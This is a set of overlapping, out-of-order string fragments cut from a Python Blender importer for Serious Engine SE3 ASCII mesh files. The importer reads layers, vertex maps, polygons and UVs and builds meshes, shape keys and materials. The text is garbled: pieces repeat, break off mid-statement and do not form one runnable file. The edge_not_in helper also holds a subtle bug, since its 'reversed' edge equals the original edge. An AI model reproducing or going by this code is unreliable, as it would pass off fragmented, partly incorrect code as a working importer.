"< num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block layer",
"= len(real_face[1]) uvs_data = [] for i in range(num_of_uv_tex): uvs_data.append([]) for vert_index in",
"num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon maps block processed_poly_maps = 0 while processed_poly_maps",
"tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges = [] num_of_indices = len(se3_vertex_indices) last_index = num_of_indices",
"= [] for se3_surface_map in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material =",
"type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT:",
"True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1 file_query.follows_block_end_decl() #close polygon block layer.polygons.append(tuple(poly)) processed_polys += 1",
"block processed_layers = 0 while processed_layers < num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index =",
"1 file_query.follows_block_end_decl() #close polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon maps block",
"( 0.0, 1.0, 0.0, 0.0), ( 0.0, 0.0, 0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name,",
"in real_faces] mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in fgon_edge_indices:",
"== se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps += 1 map =",
"processed_poly_idxs += 1 file_query.follows_block_end_decl() #close polygon count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map)",
"= se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data) + Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps if",
"num_of_map_elems: file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block processed_elems += 1",
"file_query.follows_block_end_decl() #close vertex maps block num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices",
"= num_of_values - 1 while processed_values < num_of_values: if processed_values == last_value_idx: is_last_value",
"= se3_layer.vertex_maps[0].elements edges = [] real_faces = [] se3_surface_map_indices = [0] * len(se3_layer.polygons)",
"0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map =",
"- 1 while num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers == last_pointer_index: is_last_pointer = True",
"[] num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data = [] for i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps",
"= 0 num_of_weight_maps = 0 num_of_morph_maps = 0 while processed_maps < num_of_maps: map_type",
"for se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers:",
"= bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face in mesh.polygons: face.material_index =",
"= se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp",
"file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index =",
"in face_edges: \"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count += 1 \"\"\" edges.append(face_edge) edge_index_count",
"in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts): type_idx",
"tessed_face in tessed_faces: fgon_face = [] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return",
"= [] real_faces = [] se3_surface_map_indices = [0] * len(se3_layer.polygons) material_indices = []",
"= file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index =",
"bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face in mesh.polygons: face.material_index = material_indices[face.index]",
"enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) ) return tuple([tuple(new_indices), uvs_data]) def",
"uv_data in enumerate(uvs_data): try: data = real_face[1][idx][real_index] except: data = (1,0) uv_data.append(data) return",
"enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv",
"se3_vert = se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data) + Vector(se3_disp)",
"map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block processed_elems += 1 file_query.follows_block_end_decl() #close elements block processed_maps",
"file_query.follows_block_end_decl() #close layer block processed_layers += 1 file_query.follows_block_end_decl() #close layers block return mesh",
"se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges =",
"open elements block processed_elems = 0 while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open element",
"real_faces = [] se3_surface_map_indices = [0] * len(se3_layer.polygons) material_indices = [] for se3_surface_map_index,",
"in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for",
"se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1]",
"= [] num_of_indices = len(se3_vertex_indices) last_index = num_of_indices - 1 for current_index in",
"file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif",
"(Matrix, Vector) import math filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in",
"#close polygon block layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl() #close polygons block num_of_poly_maps =",
"mathutils import (Matrix, Vector) import math filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for",
"for face_index, tex_data in enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for j,",
"se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return edges def get_bl_fgons(vertices, ngon_face): fgon_faces = [] tessed_faces =",
"get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges = get_bl_edges(fgon_face) for face_edge in face_edges: is_fgon_edge = edge_not_in(face_edge,",
"vertices block num_of_processed_vertices = 0 while num_of_processed_vertices < num_of_verts: vertex = se3.Vertex() morph_pointers",
"material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges = get_bl_edges(fgon_face) for face_edge in face_edges:",
"mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices = [] num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data = []",
"num_of_verts: vertex = se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers",
"maps block num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices = 0 while",
"block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl() #close",
"try: data = real_face[1][idx][real_index] except: data = (1,0) uv_data.append(data) return uvs_data def read_file(operator,",
"obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = []",
"if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\")",
". import se3 def get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh =",
"bl_face: real_index = real_face[0].index(vert_index) for idx, uv_data in enumerate(uvs_data): try: data = real_face[1][idx][real_index]",
"type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx",
"se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials = [] for se3_surface_map in se3_layer.surface_maps:",
"file_query.follows_block_end_decl() #close element block processed_elems += 1 file_query.follows_block_end_decl() #close elements block processed_maps +=",
"uvs_data = [] for i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for index",
"= se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0 while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs",
"materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face in mesh.polygons: face.material_index = material_indices[face.index] obj.matrix_world",
"(-elem[1]) + 1]) ) return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges = [] num_of_indices",
"processed_poly_idxs = 0 while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl() #close",
"face_edges = get_bl_edges(face[0]) for face_edge in face_edges: \"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count",
"#open polygon maps block processed_poly_maps = 0 while processed_poly_maps < num_of_poly_maps: map_type =",
"real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges = get_bl_edges(fgon_face) for face_edge in face_edges: is_fgon_edge",
"fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex =",
"block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon maps block processed_poly_maps = 0 while",
"se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0]",
"0.0, 0.0, 0.0), ( 0.0, 0.0, 1.0, 0.0), ( 0.0, 1.0, 0.0, 0.0),",
"material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face in mesh.polygons: face.material_index",
"map_name, map_is_relative) map.type_index = type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block",
"bound_edges = get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple(",
"face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces",
"file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon maps block processed_poly_maps = 0 while processed_poly_maps < num_of_poly_maps:",
"< num_of_map_elems: file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block processed_elems +=",
"vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers =",
"= real_face[0].index(vert_index) for idx, uv_data in enumerate(uvs_data): try: data = real_face[1][idx][real_index] except: data",
"= [0] * len(se3_layer.polygons) material_indices = [] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for",
"get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0]) for face_edge in face_edges: \"\"\" if edge_not_in(face_edge,",
"face_edge in face_edges: \"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count += 1 \"\"\" edges.append(face_edge)",
"polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count = 0 for se3_polygon_index, se3_polygon in",
"# open elements block processed_elems = 0 while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open",
"processed_layers < num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block",
"fgon_face)] )) face_edges = get_bl_edges(fgon_face) for face_edge in face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges)",
"uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for face_index, tex_data in enumerate(uv_tex.data): real_tex_face =",
"index in se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem",
"while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block",
"4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges",
"file_query.follows_block_end_decl() #close polygon count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon",
"== se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer)",
"se3_layer.texcoord_maps for index in se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in",
"file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block poly_map = se3.PolygonMap(map_type, map_name,",
"Vector) import math filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers:",
"file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices = 0 while num_of_processed_vertices < num_of_verts: vertex =",
"= [] for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices: other_morph_pnts =",
"0 num_of_morph_maps = 0 while processed_maps < num_of_maps: map_type = file_query.get_map_type() map_name =",
"in tessed_faces: fgon_face = [] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces",
"last_index = num_of_indices - 1 for current_index in range(num_of_indices): next_index = se3_vertex_indices[current_index +",
"uv_loop.data[k].uv = real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0, 0.0, 1.0,",
"se3_num_of_vertex_indices <= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon)",
"polygon block num_of_values = file_query.get_num_of_values() processed_values = 0 is_last_value = False last_value_idx =",
"bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces = [real_face[0] for real_face",
"[0] * len(se3_layer.polygons) material_indices = [] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index",
"processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block processed_elems",
"1]) ) return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges = [] num_of_indices = len(se3_vertex_indices)",
"se3 def get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers",
"polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle)",
"<= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face)",
"= real_face[1][idx][real_index] except: data = (1,0) uv_data.append(data) return uvs_data def read_file(operator, context): from",
"True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type ==",
"vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD:",
"num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block layer =",
"real_faces] mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon",
"uvs_data def read_file(operator, context): from mathutils import (Matrix, Vector) import math filepath =",
"processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl() #close polygon count block processed_poly_maps",
"1 while processed_values < num_of_values: if processed_values == last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value))",
"+= 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps",
"True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for",
"face in mesh.polygons: face.material_index = material_indices[face.index] obj.matrix_world = tranf_mat bpy.ops.object.transform_apply(rotation=True) context.view_layer.update() return {'FINISHED'}",
"== se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices +=",
"= [] file_query.follows_block_begin_decl() #open polygon block num_of_values = file_query.get_num_of_values() processed_values = 0 is_last_value",
"in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for face_index, tex_data in enumerate(uv_tex.data):",
"elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1",
"materials = [] for se3_surface_map in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material",
"se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face =",
"0.0, 0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map",
"file_query.follows_block_begin_decl() #open layers block processed_layers = 0 while processed_layers < num_of_layers: layer_name =",
"+= 1 file_query.follows_block_end_decl() #close polygon count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl()",
"len(real_face[1]) uvs_data = [] for i in range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face:",
"= True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type",
"real_face in real_faces] mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in",
"polygon count block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0 while processed_poly_idxs",
"1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices block",
"layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type",
"file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem =",
"se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad:",
"file_query.follows_block_begin_decl() # open elements block processed_elems = 0 while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl()",
"= 0 while processed_polys < num_of_polys: poly = [] file_query.follows_block_begin_decl() #open polygon block",
"get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1]) uvs_data = [] for i in range(num_of_uv_tex): uvs_data.append([])",
"file_query.follows_block_end_decl() #close vertex map block file_query.follows_block_end_decl() #close vertex maps block num_of_verts = file_query.get_long_value(\"VERTICES\")",
"1 else: ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0])",
"= [] for i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for index in",
"layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps",
"fgon_faces def edge_not_in(which_edge, edges): for edge in edges: edge_rev = (edge[0], edge[1]) if",
"num_of_polys: poly = [] file_query.follows_block_begin_decl() #open polygon block num_of_values = file_query.get_num_of_values() processed_values =",
"[fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges = get_bl_edges(fgon_face) for face_edge in face_edges: is_fgon_edge =",
"processed_elems += 1 file_query.follows_block_end_decl() #close elements block processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close",
"+= 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map block file_query.follows_block_end_decl() #close vertex maps block",
"if se3_weight_maps: vertex_groups = [] for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in",
"se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = [] for",
"se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count = 0 for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices =",
"version = file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers block",
"+= 1 else: ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices,",
"poly = mesh.polygons[face_index] for j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat =",
"processed_values += 1 file_query.follows_block_end_decl() #close polygon block layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl() #close",
"0 while processed_layers < num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open",
"< polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl() #close polygon count block processed_poly_maps +=",
"= get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0]) for face_edge in face_edges: \"\"\" if",
"processed_polys += 1 file_query.follows_block_end_decl() #close polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon",
"in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face in",
"in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index =",
"se3.VertexMap(map_type, map_name, map_is_relative) map.type_index = type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements",
"se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight =",
"real_faces.append(face) face_edges = get_bl_edges(face[0]) for face_edge in face_edges: \"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge)",
"0.0, 0.0, 0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True)",
"vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials = [] for se3_surface_map in se3_layer.surface_maps: material",
"for real_face in real_faces] mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index",
"edges: edge_rev = (edge[0], edge[1]) if which_edge == edge or which_edge == edge_rev:",
"vertices = se3_layer.vertex_maps[0].elements edges = [] real_faces = [] se3_surface_map_indices = [0] *",
"= num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif map_type",
"i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for index in se3_vertex_indices: se3_vertex =",
"False last_value_idx = num_of_values - 1 while processed_values < num_of_values: if processed_values ==",
"= vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers",
"tessed_faces: fgon_face = [] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def",
"while processed_values < num_of_values: if processed_values == last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values",
"vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block processed_polys = 0 while",
"in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count = 0 for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons):",
"operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers: fgon_edge_indices = [] vertices =",
"vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in",
"= len(se3_layer.texcoord_maps) uvs_data = [] for i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps",
"if which_edge == edge or which_edge == edge_rev: return False return True def",
"[] se3_surface_map_indices = [0] * len(se3_layer.polygons) material_indices = [] for se3_surface_map_index, se3_surface_map in",
"#close polygon maps block file_query.follows_block_end_decl() #close layer block processed_layers += 1 file_query.follows_block_end_decl() #close",
"in range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face: real_index = real_face[0].index(vert_index) for idx, uv_data",
"= 0 while processed_poly_maps < num_of_poly_maps: map_type = file_query.get_map_type(False) map_name = file_query.get_map_name() map_smoothing_angle",
"ngon_face) for tessed_face in tessed_faces: fgon_face = [] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index])",
